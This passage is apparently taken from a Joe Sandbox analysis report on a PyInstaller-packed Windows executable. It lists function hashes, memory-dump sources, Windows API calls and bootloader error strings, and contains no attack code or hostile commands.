                                                                                                                                                                                                                                                        • Opcode ID: 65d4a0ffdc8e7253b8e60b637b85ac8f97459ea152ba9c8238927d2e88e0f15e
                                                                                                                                                                                                                                                        • Instruction ID: 9c1786fd4b17f5b79cd11df0ac6107293177b974f067ce7bf1a7a8944732881a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65d4a0ffdc8e7253b8e60b637b85ac8f97459ea152ba9c8238927d2e88e0f15e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA12C672E0E14386FB615A14E2446BD7691FB48750F844331E79A97AE6FF3CE680CB18
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                        • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                        • Opcode ID: fc8e2330ab6ced16bd3d959f6bc8057a9fc686b659d09149717256120edd57c1
                                                                                                                                                                                                                                                        • Instruction ID: b37b781ff57f4d50f212b6f2147d2a445949578d5013872d4b63f8b1c0810dce
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc8e2330ab6ced16bd3d959f6bc8057a9fc686b659d09149717256120edd57c1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 70128462B0E14386FB349E15E0547BE7652FB58754F884235D7CA866E8EF3CE680CB18
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                        • Opcode ID: 6029b1735a59e1309af601e5d750f0b91fc035069c103727a7f18ca4da3434e5
                                                                                                                                                                                                                                                        • Instruction ID: 63184a3b8a096440870edb76e4ad8cc3131feffee9bf9bc8907a3a822d9dd84c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6029b1735a59e1309af601e5d750f0b91fc035069c103727a7f18ca4da3434e5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C41C172B1A69296EA00EB1A98046BA6791FF4DBC4F444032EF4C877B6FE3CE5059740
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                        • Opcode ID: 088a89800c7e6f5b8d7c94df284b479ca42bc713950b7ae474f5026a04d283ec
                                                                                                                                                                                                                                                        • Instruction ID: 0a787d86bbd0813ae27d0cf120c90445e0ce270f01d261191f9d02e16d6eb94d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 088a89800c7e6f5b8d7c94df284b479ca42bc713950b7ae474f5026a04d283ec
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84419D72A1A68296EA00DF2594102F967A1FF4C794F444432EF4D87BB9FE3CE5419701
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                                                                                                        • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                        • Opcode ID: 7d7d5a635fcd63c536a58b816f4712f1a96a9e43b0d550c3d6dd02e630e8922c
                                                                                                                                                                                                                                                        • Instruction ID: 2a8f6accc49790378ba761b982f94f96036dfd448f74de9c3b0485e3884cfd5d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d7d5a635fcd63c536a58b816f4712f1a96a9e43b0d550c3d6dd02e630e8922c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73D19F32A097418AEB649F65D4403AD77A0FB4D788F100135EF8D97BA6EF38E491C704
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6ABA42AC6,?,00007FF6ABA42BC5), ref: 00007FF6ABA42360
                                                                                                                                                                                                                                                        • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6ABA42AC6,?,00007FF6ABA42BC5), ref: 00007FF6ABA4241A
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentFormatMessageProcess
                                                                                                                                                                                                                                                        • String ID: %ls$%ls: $<FormatMessageW failed.>$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                        • API String ID: 27993502-4247535189
                                                                                                                                                                                                                                                        • Opcode ID: 92e20a795bf73765402ca9ec7783ee5ad9f8f927f89bd5dd19570627e0bc01fb
                                                                                                                                                                                                                                                        • Instruction ID: 19a7a8b15d85e73f11c4a1279b4f9e404feaa5e7373c786491b6863a9784ed22
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92e20a795bf73765402ca9ec7783ee5ad9f8f927f89bd5dd19570627e0bc01fb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0B31E562B0AA4141E6209B25B9106AAB661FF88BD8F400135EF8DD3B79FE3CE106C700
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF6ABA4D50A,?,?,?,00007FF6ABA4D1FC,?,?,?,00007FF6ABA4CDF9), ref: 00007FF6ABA4D2DD
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6ABA4D50A,?,?,?,00007FF6ABA4D1FC,?,?,?,00007FF6ABA4CDF9), ref: 00007FF6ABA4D2EB
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF6ABA4D50A,?,?,?,00007FF6ABA4D1FC,?,?,?,00007FF6ABA4CDF9), ref: 00007FF6ABA4D315
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF6ABA4D50A,?,?,?,00007FF6ABA4D1FC,?,?,?,00007FF6ABA4CDF9), ref: 00007FF6ABA4D383
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF6ABA4D50A,?,?,?,00007FF6ABA4D1FC,?,?,?,00007FF6ABA4CDF9), ref: 00007FF6ABA4D38F
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                                        • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                        • Opcode ID: ec1d8984956c5f4cef63aabdc1ab3d005d502d88db624b4fbd9ceb099b80f4f4
                                                                                                                                                                                                                                                        • Instruction ID: 2210fdfbd23f8990022f36a552a6468f69fbc0a58ce8731364c8c2b154fc2d0b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ec1d8984956c5f4cef63aabdc1ab3d005d502d88db624b4fbd9ceb099b80f4f4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA31AF21B1BA4291EE219B06A80027923D4FF4DBA4F5A0535DF9D8B3A4FF3CE8558200
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                        • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                        • Opcode ID: bdf35f00908a663c977b541a1155eb73016cf86817925c7fc1db5880fcbaeba1
                                                                                                                                                                                                                                                        • Instruction ID: b33e1610c106f3bbb28eb042ad49301e434d97bf3726dbc925d7d167c8ab0afe
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bdf35f00908a663c977b541a1155eb73016cf86817925c7fc1db5880fcbaeba1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4141BD71A1AA87A1EA20DB64E4142EA6365FF5C784F800132EB5DC36B6FF3CE615C740
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                                                        • Opcode ID: 6cd12d297b2340e5ffa7c7392ce0e4cdced9a85fa0896577ca3510b685e0d80d
                                                                                                                                                                                                                                                        • Instruction ID: b6deb2a23c0337fd3bc4d35765c76f8a06834286bfabb8308c005e4ed047f0f3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6cd12d297b2340e5ffa7c7392ce0e4cdced9a85fa0896577ca3510b685e0d80d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC218B61B0F28242FAA9A77596912395252CF4C7B0F044734DB3ED7AFAFE6DB9418304
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                        • String ID: CONOUT$
                                                                                                                                                                                                                                                        • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                        • Opcode ID: 09a7ef29c2f791f79e4b414a588c98caae924e0a86b8d7fe5631f15f3a619b4d
                                                                                                                                                                                                                                                        • Instruction ID: 8cc93a29b3eb8882e8e90cd25300e7cf4600ec6fe78740a6d23928b995b8cc0f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09a7ef29c2f791f79e4b414a588c98caae924e0a86b8d7fe5631f15f3a619b4d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB1190B1B19A4186E7608B56E85432972A0FB8CBE4F104235EB5DC7BA4EF7CD4548740
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(FFFFFFFF,?,?,00000000,00007FF6ABA48706), ref: 00007FF6ABA479E2
                                                                                                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF6ABA48706), ref: 00007FF6ABA47A39
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA48950: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6ABA43A04,00000000,00007FF6ABA41965), ref: 00007FF6ABA48989
                                                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF6ABA48706), ref: 00007FF6ABA47AC8
                                                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF6ABA48706), ref: 00007FF6ABA47B34
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,00000000,00007FF6ABA48706), ref: 00007FF6ABA47B45
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,00000000,00007FF6ABA48706), ref: 00007FF6ABA47B5A
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3462794448-0
                                                                                                                                                                                                                                                        • Opcode ID: e394586919bb787c5c57ed27fc0ac332066dc84938bb9692acbe845e24378f8e
                                                                                                                                                                                                                                                        • Instruction ID: 04ef738877709ef384c9e0da327d08209326227ded7b936f900e2215142b48cc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e394586919bb787c5c57ed27fc0ac332066dc84938bb9692acbe845e24378f8e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC419262B1A6C241EA309F21A5506AA6394FF8CBC4F450135DF8DD77AAFE3CD545C700
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6ABA55E51,?,?,?,?,00007FF6ABA5B392,?,?,?,?,00007FF6ABA580CB), ref: 00007FF6ABA5C1D7
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6ABA55E51,?,?,?,?,00007FF6ABA5B392,?,?,?,?,00007FF6ABA580CB), ref: 00007FF6ABA5C20D
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6ABA55E51,?,?,?,?,00007FF6ABA5B392,?,?,?,?,00007FF6ABA580CB), ref: 00007FF6ABA5C23A
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6ABA55E51,?,?,?,?,00007FF6ABA5B392,?,?,?,?,00007FF6ABA580CB), ref: 00007FF6ABA5C24B
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6ABA55E51,?,?,?,?,00007FF6ABA5B392,?,?,?,?,00007FF6ABA580CB), ref: 00007FF6ABA5C25C
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF6ABA55E51,?,?,?,?,00007FF6ABA5B392,?,?,?,?,00007FF6ABA580CB), ref: 00007FF6ABA5C277
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                                                        • Opcode ID: 297eb830bf51183a03152683679a33ac8e7e939d0b2a29d40b44e033b6affbc9
                                                                                                                                                                                                                                                        • Instruction ID: d3f2a5e2575890ede46f5f2e7bfcefad06e41994e66be325a87fb691ca68acb4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 297eb830bf51183a03152683679a33ac8e7e939d0b2a29d40b44e033b6affbc9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD118B61B0E24642FAA5A7B9569023D5152DF4C7B0F044334DB2ED6AFAFE2CA9418304
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                        • Opcode ID: f90418b582b416691a14bbb2ae6c6b71f2096e7654ee2338269033ad2dc175a6
                                                                                                                                                                                                                                                        • Instruction ID: afb5551aff92f22a114078455c97aa18218203a27de90422cc8cbf2fa0da4a12
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f90418b582b416691a14bbb2ae6c6b71f2096e7654ee2338269033ad2dc175a6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3FF0F6A1B1AA4291EB108B24E4543391320EF4CBA1F440739C7AEC62F4EF2CD544C700
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
